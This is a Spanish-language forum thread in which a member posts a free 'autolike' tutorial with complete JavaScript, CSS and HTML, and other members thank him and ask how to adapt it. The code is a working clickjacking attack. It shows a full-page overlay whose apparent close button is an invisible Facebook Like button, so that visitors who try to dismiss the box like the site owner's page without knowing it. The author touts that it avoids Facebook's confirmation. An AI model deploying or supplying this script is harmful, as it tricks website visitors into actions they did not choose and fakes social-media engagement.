Tutorial: Script autolike (propio), [Version: beta]

• Autor Autor Saag10
  • Fecha de inicio Fecha de inicio
Estado

🔒 Este tema está cerrado para nuevas respuestas.

⏰ Solo el creador del tema puede solicitar la reapertura de sus propios temas, pero únicamente dentro de los 60 días previos a la última actualización.

Saag10

Saag10

Gamma
Programador
Verificación en dos pasos activada
Verificado por Whatsapp
Script autolike (propio), [Version: beta], gratis

Hola amigos, he estado programando este pequeño script y al fin me ha funcionado después de tantas horas.
He visto que hay varios autolikes en la web y algunos están muy bien hechos pero otros son muy poco eficientes, no digo que el mio sea tan eficiente solo que estoy aprendiendo y quiero aportarle algo a la internet tanto como me han aportado a mí. 😛8: :encouragement:

Dejo enlistado los pro's y contra's que hasta el momento vi.
A favor:
1.- Tendrás más likes.
2.- Gratis.
3.- Independiente de la página.
4.- Solo tienes que subir 2 archivos.
5.- Facebook no te pedirá confirmación para el autolike.
6.- No afecta en adsense.

En contra:
1.- Si el usuario que entra no está logueado en facebook, le aparecerá una ventana.
2.- El botón oculto puede ser la misma página que aparece en el contenedor, pero puedes cambiarlo a tu gusto, lo explicaré en el post.
3.- Tarda un par de segundos en cerrar.

Explicación breve; el script es un cuadrito que se muestra por encima de toda la página y se cierra solo si el usuario le da click en la tacha(botón invisible) de otra manera si no se encuentra logueado el usuario en facebook aparecerá una ventana de "feisbul" para que ingreses y lo mejor es que, tengo casi el 100% de seguridad de que no habrá confirmación para dar like.
Captura de pantalla_2015-07-26_20-44-53.webp
Captura de pantalla_2015-07-26_20-54-43.webp

El script lo usé solo unos cuantos minutos, no sé qué tan veloz funcione con los likes, si te gusta pruébalo y deja tu opinión en la caja de comentarios y trataré de mejorar el script, vamos, que no todo funciona bien a la primera :drunk: .

Me ha tomado muchas horas de realizar este script, me duelen las posaderas, me gasté dinero comprando comida chatarra, café y chocolates para tener carbohidratos en el cerebro 😀 jaja y te lo daré completamente gratis y opensource ¡woow! , aunque siendo sinceros, si te funciona tendrás mucho más visitas y por lo tanto más ingresos, entonces si te ha funcionado regálame algo de propina que te sobre de tu paypal y sino, solo insúltame diciendo que soy un fracasado. Soy estudiante y me bloquearon una de mis páginas de google 😕, estudihambres dicen por ahí . Pero en fin, si tienes las ganas de donarme algo de dinero te dejo mi correo de paypal -- sergiomen4@gmail.com.

Ahora vamos con el tutorial, ¡por fin nenes!:

El primero archivo lo llamaremos engine.js y tendrá una cookies de 24 horas, y, después pasadas las 24 horas se mostrará de nuevo el cuadrito, y te preguntarás ¿qué pasará con el like?, pues digamos que el usuario cuando le de click se quitará el like pero no desaparecerá la ventana, solo tendrá que dar de nuevo click y de nuevo tendrás el like. Es un poco ineficiente, lo sé, pero no encontré otra forma de hacer que desaparezca, si tú te la sabes, házmelo saber. EJEMPLO AQUÍ.
Insertar CODE, HTML o PHP:
//Creado por saag10, la persona mas guapa que mantiene a raya el tráfico de bolillo y telera

var Cukie = getCookie("atlk");

//if cookie is not set, show the window with styles
 if(Cukie!="1"){

displayBlock();
 }

//for the cookies
function setCookie(cname, cvalue, exdays) {
    var d = new Date();
    d.setTime(d.getTime() + (exdays*24*60*60*1000));
    var expires = "expires="+d.toUTCString();
    document.cookie = cname + "=" + cvalue + "; " + expires;
}

function getCookie(cname) {
    var name = cname + "=";
    var ca = document.cookie.split(';');
    for(var i=0; i<ca.length; i++) {
        var c = ca[i];
        while (c.charAt(0)==' ') c = c.substring(1);
        if (c.indexOf(name) != -1) return c.substring(name.length, c.length);
    }
    return "";
}

//Create elements and instance events
function displayBlock(){

$("document").ready(function(){

(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "http://connect.facebook.net/es_ES/sdk.js#xfbml=1&version=v2.3"; fjs.parentNode.insertBefore(js, fjs); }(document, "script", "facebook-jssdk"));

var laic = "<fb:like href='AQUI LA DIRECCION DE TU FACEBOOK PARA DAR LIKE' show_faces='false' width='450' style='float:left; margin-left:-17px; margin-top:5px;'></fb:like> <div id='fb-root'></div> ";

var TotalLaics = "<div class='blanco'><div class='fb-page' data-href='AQUI LA OTRA URL DE OTRO FACEBOOK O EL MISMO' data-width='200px' data-hide-cover='false' data-show-facepile='false' data-show-posts='false'><div class='fb-xfbml-parse-ignore'></div></div> </div>";

var square = document.createElement("div");
		square.id = "capaclick";
		$("body").append(square);

var contenedor = document.createElement("div");
		contenedor.id = "contenedor";
		$(contenedor).insertAfter("#capaclick");

var x0_002 = document.createElement("div");
		x0_002.id = "x0_002";
		$(x0_002).insertAfter(contenedor);

var opaco = document.createElement("div");
		opaco.id = "opaco";
		$(opaco).insertAfter(x0_002);	
		$(opaco).html(laic);		

var barrita = document.createElement("div");
		barrita.id = "barrita";
		barrita.innerHTML ="<h3> Gracias por visitarnos</h3>";
		$(barrita).insertAfter(contenedor);

$("#contenedor").html(TotalLaics);

FB.Event.subscribe('edge.create', function() { setCookie("atlk","1",1);  $(square).remove(); $(contenedor).remove(); $(x0_002).remove(); $(opaco).remove(); $(barrita).remove(); });   FB.Event.subscribe('edge.remove', function() {  });

});

}

El segundo archivo puedes llamarlo «estilachos.css» o como mejor prefieras para no confundirlo:

Insertar CODE, HTML o PHP:
#capaclick {background: rgba(0, 0, 0, 0.6); position: fixed; top: 0; left: 0; width: 100%; height: 100%; }

#contenedor {background: #f1f1f1;border-radius:5px;box-shadow: 0 0 5px 0px inset; width: 300px; height: 200px; position: fixed; left: 0; top: 0; bottom: 0; right: 0; margin: auto;}

#x0_002 {background: url(http://www.fordesigner.com/imguploads/Image/cjbc/zcool/png20080526/1211755976.png); width: 30px; height: 30px; overflow: hidden; background-size: 100%; position: fixed; left: 0; top: 0; bottom: 160px; right: -260px; margin: auto;hidden  z-index: 9990; }

#opaco {overflow: hidden; width: 30px; height:30px; position: fixed; left: 12; top: 0; bottom: 160px; right: 523px; margin: auto;  z-index: 9999; -moz-opacity: 0.0; -khtml-opacity: 0.0; opacity: 0.0; -ms-filter:"progid:DXImageTransform.Microsoft.Alpha"(Opacity=0); filter: progid:DXImageTransform.Microsoft.Alpha(opacity=0); filter:alpha(opacity=0);}

#barrita {background-color: rgb(0, 130 , 255); width: 300px; height:40px; position: fixed; left: 0; top: 0; bottom: 158px; right: 0; margin: auto; overflow:hidden;}

.blanco { margin-left: 18%; margin-top: 40px;}

Bien, ahora solo agregas esto dentro de la etiqueta <head></head>

HTML:
<script src="https://code.jquery.com/jquery-1.11.2.min.js"></script>
 <script src="engine.js"></script> 
<script src='http://connect.facebook.net/es_ES/all.js#xfbml=1'></script>
<link rel="stylesheet" href="estilachos.css">

Bien, por ahora eso es todo. Mas adelante desarrollaré uno para poder compartir automáticamente pero será de paga :greedy_dollars::greedy_dollars: de algo tengo que vivir jeje.

Si te gustó compártelo y dóname 25 mil dolares o insúltame, como mejor lo prefieras. Saludos amigos.

Actualizado 27 - julio - 3:34 GTM -6; Desde que puse el código, mis likes aumentaron en cantidad con 23 unidades aprox.(6 horas creo)

Última edición:
Muy bueno amigo, tendrías que venderlos para sacarle dinero. En mi caso no tengo como para donar en este momento, la manera de recompensarte es con un "Me Agrada" y espero que los otros usuarios lo hagan, ya que los mejores post tienen premio (creo que sigue vigente :witless🙂.

Agrego un dato adicional para quien quiersa usar autolike pero tienen un sistema de POPUP COMO PUBLICLIDAD.. no lo usen! Baja enormemente el rendimiento!

Muy bueno amigo, tendrías que venderlos para sacarle dinero. En mi caso no tengo como para donar en este momento, la manera de recompensarte es con un "Me Agrada" y espero que los otros usuarios lo hagan, ya que los mejores post tienen premio (creo que sigue vigente :witless🙂.

Gracias amigo, saludos.

Agrego un dato adicional para quien quiersa usar autolike pero tienen un sistema de POPUP COMO PUBLICLIDAD.. no lo usen! Baja enormemente el rendimiento!

Pueda que sí, sobre todo con los usuarios que tienen internet lento. Aunque si tienes adsense te puede funcionar bien.

es igual a un plugin que vi no recuerdo si fue acá o en el foro vecino :v , pero es lo mismo 😕 igual muchas gracias por el aporte , se te agradece .
Saludos!

De verdad se te agradece el aporte, espero poder usarlo en algún sitio 😉

No hay problema con AdSense ? :sorrow:

Gracias por el tutorial espero que no lo edites ya que me dio sueno y quiero leerlo todo tranquilamente manana xD buen tutorial te dare un gran me agrada xD porque de donacion me quede con 0 luego de retirar mi dinero y pagar la universidad 😕

es igual a un plugin que vi no recuerdo si fue acá o en el foro vecino :v , pero es lo mismo 😕 igual muchas gracias por el aporte , se te agradece .
Saludos!

Bueno, no niego que el diseño sea parecido a algunos otros porque vi uno y me pareció interesante. Aunque debo decirte que la parte de javascript fue hecha por mí, te puedo dar un ejemplo, mira: var a = 1; :encouragement:

De verdad se te agradece el aporte, espero poder usarlo en algún sitio 😉
Espero te funcione hermano, saludos.

No hay problema con AdSense ? :sorrow:

No creo que haya problema, ya que es independiente y no maniobra con código de tu página.

Gracias por el tutorial espero que no lo edites ya que me dio sueno y quiero leerlo todo tranquilamente manana xD buen tutorial te dare un gran me agrada xD porque de donacion me quede con 0 luego de retirar mi dinero y pagar la universidad 😕

No te preocupes hermano, espero te funcione.
Somos estudihambres los 2, suerte.

muchas gracias, va me agrada y a probar!

Gracias por el aporte, Saludos Cordiales:witless:🙂

[MENTION=143271]Saag10[/MENTION] A favoritos, muchas gracias 😱😛7:

[MENTION=143271]Saag10[/MENTION] A favoritos, muchas gracias 😱😛7:

Espero que te sirva, saludos.

- - - Actualizado - - -

Si ha alguien le ha funcionado bien que deje un comentario con alguna captura, saludos

- - - Actualizado - - -

De ayer a hoy dejo los likes con un poco de spam en twitter

EE6.webp

gracias a favoritos..
men alguna forma de ponerlos en blogger?

Hace unos días lo vi y lo guardé para poder verlo más detalladamente ahora, y tengo una pregunta. ¿si quisiera sólo que aparezca en un celular, cómo lo haría?

¿Si es posible hacer eso?, también pensaba implementar en el código otras funciones, y ojalá se adapte.

Saludos. 😛8:😛8::encouragement:

gracias a favoritos..
men alguna forma de ponerlos en blogger?
Hace unos días lo vi y lo guardé para poder verlo más detalladamente ahora, y tengo una pregunta. ¿si quisiera sólo que aparezca en un celular, cómo lo haría?

¿Si es posible hacer eso?, también pensaba implementar en el código otras funciones, y ojalá se adapte.

Saludos. 😛8:😛8::encouragement:

Sí es posible en los 2 casos, se los hago por un módico precio ¿qué dicen?

- - - Actualizado - - -

Última edición:
Estado

🔒 Este tema está cerrado para nuevas respuestas.

⏰ Solo el creador del tema puede solicitar la reapertura de sus propios temas, pero únicamente dentro de los 60 días previos a la última actualización.

Atrás